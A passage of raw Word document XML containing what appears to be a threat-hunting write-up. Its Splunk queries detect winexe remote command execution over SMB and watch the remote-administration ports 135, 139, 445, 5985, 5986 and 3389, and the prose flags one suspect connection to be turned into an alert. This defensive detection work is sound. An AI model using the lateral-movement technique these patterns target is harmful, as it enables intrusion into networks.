          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=_time + 60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0D0B7905" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| table _time host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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end_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0C2E6047" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| map </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>maxsearches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=10 search="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6A3044C1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    search index=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>packet_stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="58CA8C75" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    earliest=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ latest=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6D7B575E"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dest_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IN (135, 139, 445, 5985, 5986, 3389)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2FD39C72" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">" | table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dest_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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dest_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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dest_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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src_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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src_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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protocol_stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="64259F72" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1262D70C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776EFC39" wp14:editId="433EA6E3">
            <wp:extent cx="4953000" cy="591608"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1374528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2896" name="Picture 13745289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41473" cy="614120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="74E099C9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="67789739" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">We can confirm that within the time range there was one connection on port 445 from 192.168.0.132 using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ip:tcp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>:smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol stack which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> rely on for remote command execution. This is our likely suspect. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="184E526E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0FBD0EF2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">To generalize the search back to its root cause lets search for any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="62F30A3E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>winsysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parent_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="20DCCC6F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| eval </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=_time - 60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="519B84FB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| eval </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=_time + 60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="56497609" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| table _time host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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end_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5B4223D7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| map </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>maxsearches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=13 search="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1365D084" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    search index=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>packet_stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="43FD1086" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    earliest=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ latest=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5E6FC3D6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>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dest_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IN (135, 139, 445, 5985, 5986, 3389)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="00B8DCCF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">" | table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dest_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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dest_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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dest_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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src_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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src_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>protocol_stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="28FD1A99" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="00FE6445" w:rsidRDefault="0081210C" w14:paraId="31784779" w14:textId="6F5ED371">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Which will have the save results and any command executed through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> we want to identify and set that as an alert. This query/alert will include suspect IP addresses from which a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
